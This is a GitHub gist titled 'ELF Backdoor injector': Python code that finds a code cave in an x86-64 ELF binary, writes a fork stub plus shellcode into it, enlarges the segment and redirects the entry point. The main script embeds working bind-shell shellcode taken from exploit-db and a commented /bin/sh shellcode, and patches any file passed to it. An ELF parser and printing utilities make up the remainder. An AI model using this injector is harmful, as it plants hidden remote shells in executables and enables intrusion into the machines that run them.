Skip to content

Instantly share code, notes, and snippets.

@suzuke
Created August 28, 2022 06:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save suzuke/d23a8db3c802de9f9a541240ad54b526 to your computer and use it in GitHub Desktop.
Save suzuke/d23a8db3c802de9f9a541240ad54b526 to your computer and use it in GitHub Desktop.
ELF Backdoor injector
from utils import parse_args
from parse import elf_info
from struct import pack
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.NOTSET)
class injector:
def __init__(self, file, inject_code: bytes):
self.file = file
self.info = elf_info(self.file)
code = b''.join([b'\x6a\x39', # push 0x39
b'\x58', # pop rax
b'\x0f\x05', # syscall
b'\x48\x85\xc0', # test rax, rax
b'\x74\x0c', # je 0x16
# movabs rbp, entry
b'\x48\xbd' + pack('<Q', self.info.header['e_entry']),
b'\xff\xe5', # jmp rbp
inject_code]) # inject code
segs = self.find_cave(len(code))
if len(segs) == 0:
logger.error('No cave in the program')
return
target_idx = segs[0]['index']
target = self.info.segments[target_idx]
code_offset = target['p_offset'] + target['p_filesz']
logger.info(f'Writing code to 0x{code_offset:x}')
self.add_machine_code(code_offset, code)
new_size = target['p_filesz'] + len(code)
logger.info(f'Writing file/mem size to 0x{new_size:x}')
self.extend_seg_size(target_idx, new_size)
code_va = target['p_vaddr'] + target['p_filesz']
logger.info(f'Writing entry to 0x{code_va:x}')
self.modify_entry(code_va)
def verify_cave(self, start: int, len_: int) -> int:
'''
Walking through file to verlify cave's size
'''
self.file.seek(start)
count = 0
while self.file.tell() < start + len_:
b = self.file.read(1)
if b == b'\x00':
count += 1
else:
break
return count
def find_cave(self, need_size: int):
'''
Find the cave in LOAD, exec segment
cave means segment's file size is smaller than alloc size
'''
load_segs = list(filter(lambda x: x['p_type'] == 1,
self.info.segments))
if len(load_segs) <= 0:
exit(1)
cave_segs = []
for i in range(len(load_segs) - 1):
c_seg = load_segs[i]
n_seg = load_segs[i + 1]
# Not a LOAD segments
if not c_seg['p_flags'] & 1:
continue
# First verify
max_range = c_seg['p_filesz'] + c_seg['p_vaddr']
if max_range >= n_seg['p_vaddr']:
continue
real_size = self.verify_cave(c_seg['p_offset'] + c_seg['p_filesz'],
n_seg['p_vaddr'] - max_range)
# cave size is too small
if real_size <= need_size:
continue
logger.info(f'Found a {real_size} bytes cave')
cave_segs.append({'index': self.info.segments.index(c_seg),
'cave_size': real_size})
return cave_segs
def extend_seg_size(self, seg_pos: int, new_size: int):
'''
Patch segment to increase LOAD file size
'''
file_pos = self.info.header['e_phoff'] + \
seg_pos * self.info.header['e_phentsize']
if self.info.header['e_machine'] == 62:
file_pos += 32
# TODO: abstract elf types to adapt more architectures
else:
pass
self.file.seek(file_pos)
# TODO: static pack size
self.file.write(pack('<Q', new_size) * 2)
def add_machine_code(self, pos: int, code: bytes):
'''
Add code in the increased LOAD segments
'''
self.file.seek(pos)
self.file.write(code)
def modify_entry(self, new_entry: int):
self.file.seek(24)
self.file.write(pack('<Q', new_entry))
if __name__ == "__main__":
'''
# NOP Test
code = b'\x90\x90\x90'
# spawn a shell
code = b'\x48\x31\xf6\x56'
code += b'\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68'
code += b'\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
'''
# Bind shell: <https://www.exploit-db.com/shellcodes/41128>
code = b"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02"
code += b"\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0"
code += b"\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58"
code += b"\x0f\x05"
code += b"\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05"
code += b"\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
code += b"\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
args = parse_args()
if args.file:
with open(args.file, 'rb+') as f:
injector(f, code)
'''
[ELF Document](https://uclibc.org/docs/elf-64-gen.pdf)
'''
from utils import parse_args, debug_print
from struct import unpack
from typing import List, Dict, BinaryIO, Union, Any
# Parsed ELF header: field name -> value (integers, plus the e_ident tuple).
Header = Dict[str, Any]
# One dict per program header entry: field name -> integer value.
Segments = List[Dict[str, int]]
# One dict per section header entry: integer fields, plus the resolved
# section name string stored under 's_name_str'.
Sections = List[Dict[str, Union[int, str]]]
class elf_info:
    '''
    Parse a little-endian ELF64 file and expose its header tables.

    After construction the instance carries:
      header   -- dict of ELF header fields (e_ident, e_type, ...)
      segments -- list of program header dicts (p_type, p_flags, ...)
      sections -- list of section header dicts (sh_name, sh_type, ...),
                  each extended with its resolved name under 's_name_str'

    Only the 64-bit little-endian layout is understood; files of another
    class or byte order are decoded with the same layout.
    A truncated table makes struct.unpack raise struct.error.
    '''

    # struct layouts: '<' means little-endian without padding, and every
    # 16-bit field is unsigned so values >= 0x8000 do not turn negative.
    _EHDR_FMT = '<HHIQQQIHHHHHH'  # the 48 bytes that follow e_ident
    _EHDR_KEYS = ('e_type', 'e_machine', 'e_version', 'e_entry',
                  'e_phoff', 'e_shoff', 'e_flags', 'e_ehsize',
                  'e_phentsize', 'e_phnum', 'e_shentsize', 'e_shnum',
                  'e_shtrndx')
    _PHDR_FMT = '<IIQQQQQQ'
    _PHDR_SIZE = 56
    _PHDR_KEYS = ('p_type', 'p_flags', 'p_offset', 'p_vaddr', 'p_paddr',
                  'p_filesz', 'p_memsz', 'p_align')
    _SHDR_FMT = '<IIQQQQIIQQ'
    _SHDR_SIZE = 64
    _SHDR_KEYS = ('sh_name', 'sh_type', 'sh_flags', 'sh_addr', 'sh_offset',
                  'sh_size', 'sh_link', 'sh_info', 'sh_addralign',
                  'sh_entsize')

    def __init__(self, file: BinaryIO):
        '''
        Parse `file`, a seekable binary file object, immediately.
        '''
        self.file = file
        self.header = self._parse_header()
        self.segments = self._parse_segment()
        self.sections = self._parse_section()
        self._add_section_name()

    def _parse_header(self) -> 'Header':
        '''
        header parse part.

        Always reads from file offset 0, whatever the current position is.
        The key 'e_shtrndx' (sic) is kept as is for existing callers.
        '''
        self.file.seek(0)
        hdr: Dict[str, Any] = {}
        hdr['e_ident'] = unpack('<4sccccc6sc', self.file.read(16))
        hdr.update(zip(self._EHDR_KEYS,
                       unpack(self._EHDR_FMT, self.file.read(48))))
        return hdr

    def _read_table(self, offset: int, count: int, stride: int,
                    fmt: str, size: int, keys) -> List[Dict[str, Any]]:
        '''
        Read `count` fixed-layout entries starting at file `offset`.

        `stride` is the entry size declared in the ELF header. Entries are
        located with it so that padded entries are stepped over correctly;
        a declared size smaller than the layout cannot be honoured and
        falls back to tightly packed entries.
        '''
        step = max(stride, size)
        rows = []
        for idx in range(count):
            self.file.seek(offset + idx * step)
            rows.append(dict(zip(keys, unpack(fmt, self.file.read(size)))))
        return rows

    def _parse_segment(self) -> 'Segments':
        '''
        segment/program header parse part.
        '''
        return self._read_table(self.header['e_phoff'],
                                self.header['e_phnum'],
                                self.header['e_phentsize'],
                                self._PHDR_FMT, self._PHDR_SIZE,
                                self._PHDR_KEYS)

    def _parse_section(self) -> 'Sections':
        '''
        section parse part.
        '''
        return self._read_table(self.header['e_shoff'],
                                self.header['e_shnum'],
                                self.header['e_shentsize'],
                                self._SHDR_FMT, self._SHDR_SIZE,
                                self._SHDR_KEYS)

    def _read_cstring(self, offset: int) -> str:
        '''
        Read the NUL-terminated string at file `offset`.

        Stops at end of file when the terminator is missing, and replaces
        undecodable bytes instead of raising.
        '''
        self.file.seek(offset)
        raw = bytearray()
        while True:
            chunk = self.file.read(64)
            if not chunk:
                # EOF before a terminator: keep what was collected
                break
            end = chunk.find(b'\x00')
            if end != -1:
                raw += chunk[:end]
                break
            raw += chunk
        return raw.decode('utf-8', errors='replace')

    def _add_section_name(self):
        '''
        After section parsing,
        use the ELF header's section-name string table index to locate the
        string table and store every section's name under 's_name_str'.

        When the index is 0 (no string table) or does not refer to a parsed
        section, every name is set to the empty string.
        '''
        strndx = self.header['e_shtrndx']
        strtab_off = None
        if 0 < strndx < len(self.sections):
            strtab_off = self.sections[strndx]['sh_offset']
        for sec in self.sections:
            name_off = sec['sh_name']
            if isinstance(strtab_off, int) and isinstance(name_off, int):
                sec['s_name_str'] = self._read_cstring(strtab_off + name_off)
            else:
                sec['s_name_str'] = ''

    def analyse_segment(self) -> Dict[int, List[str]]:
        '''
        Analyse the relation between sections and segments.

        Returns a dict mapping each segment index to the names of the
        sections whose address range [sh_addr, sh_addr + sh_size] lies
        inside that segment's [p_vaddr, p_vaddr + p_memsz] range.
        '''
        dic: Dict[int, List[str]] = {i: [] for i in range(len(self.segments))}
        for sec in self.sections:
            # isinstance asserts only narrow the Union value type for mypy
            assert isinstance(sec['sh_addr'], int) and \
                isinstance(sec['sh_size'], int)
            sec_begin = sec['sh_addr']
            sec_end = sec_begin + sec['sh_size']
            for i, seg in enumerate(self.segments):
                seg_begin = seg['p_vaddr']
                seg_end = seg_begin + seg['p_memsz']
                if sec_begin >= seg_begin and sec_end <= seg_end:
                    assert isinstance(sec['s_name_str'], str)
                    dic[i].append(sec['s_name_str'])
        return dic
if __name__ == '__main__':
    # Dump the header, program headers, section headers and the
    # section-to-segment mapping of the file given with -f/--file.
    args = parse_args()
    if not args.file:
        # without this guard open(None) fails with an opaque TypeError
        raise SystemExit('no input file: pass one with -f/--file')
    with open(args.file, 'rb') as f:
        info = elf_info(f)
    result = info.analyse_segment()
    debug_print(info.header,
                info.segments,
                info.sections,
                result)
from argparse import ArgumentParser
from logging import getLogger, NOTSET
def get_logger(name: str = ''):
    '''
    Return the logger registered under `name`, with its level set to NOTSET.

    The default empty name selects the root logger.
    '''
    named_logger = getLogger(name)
    named_logger.setLevel(NOTSET)
    return named_logger
def parse_args():
    '''
    Parse the process command line and return the resulting namespace.

    The only option is -f/--file; `file` is None when it is not given.
    '''
    cli = ArgumentParser()
    cli.add_argument('-f', '--file')
    parsed = cli.parse_args()
    return parsed
def print_table(lst):
    '''
    Print one table row to stdout.

    Strings are cut to 10 characters and integers are shown in hex; both
    are left-aligned in a 10-character column followed by one space.
    Items of any other type are left out of the row.
    '''
    cells = []
    for item in lst:
        if isinstance(item, str):
            cells.append(f'{item[:10]:<10s} ')
        elif isinstance(item, int):
            cells.append(f'{item:<10x} ')
    print(''.join(cells))
def debug_print(header,
                segments,
                sections,
                result):
    '''
    Print a dump of parsed ELF information to stdout.

    header   -- mapping of header field name to value
    segments -- list of program header dicts
    sections -- list of section header dicts
    result   -- mapping of segment index to a list of section names

    An empty segment or section list prints only its heading instead of
    failing on the missing first entry.
    '''
    print('[+] ELF Header')
    for k, v in header.items():
        print(' ', f'{k} {v}')
    print('[+] segments')
    if segments:
        # the first entry's keys serve as the column titles
        print_table(list(segments[0].keys()))
        for seg in segments:
            print_table(list(seg.values()))
    print('[+] sections')
    if sections:
        # every section dict is built with the same keys, so the first one
        # is enough for the titles and works for a single-section file too
        print_table(list(sections[0].keys()))
        for sec in sections:
            print_table(list(sec.values()))
    print('[+] analyse')
    for idx, names in result.items():
        print(idx, ' '.join(names))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment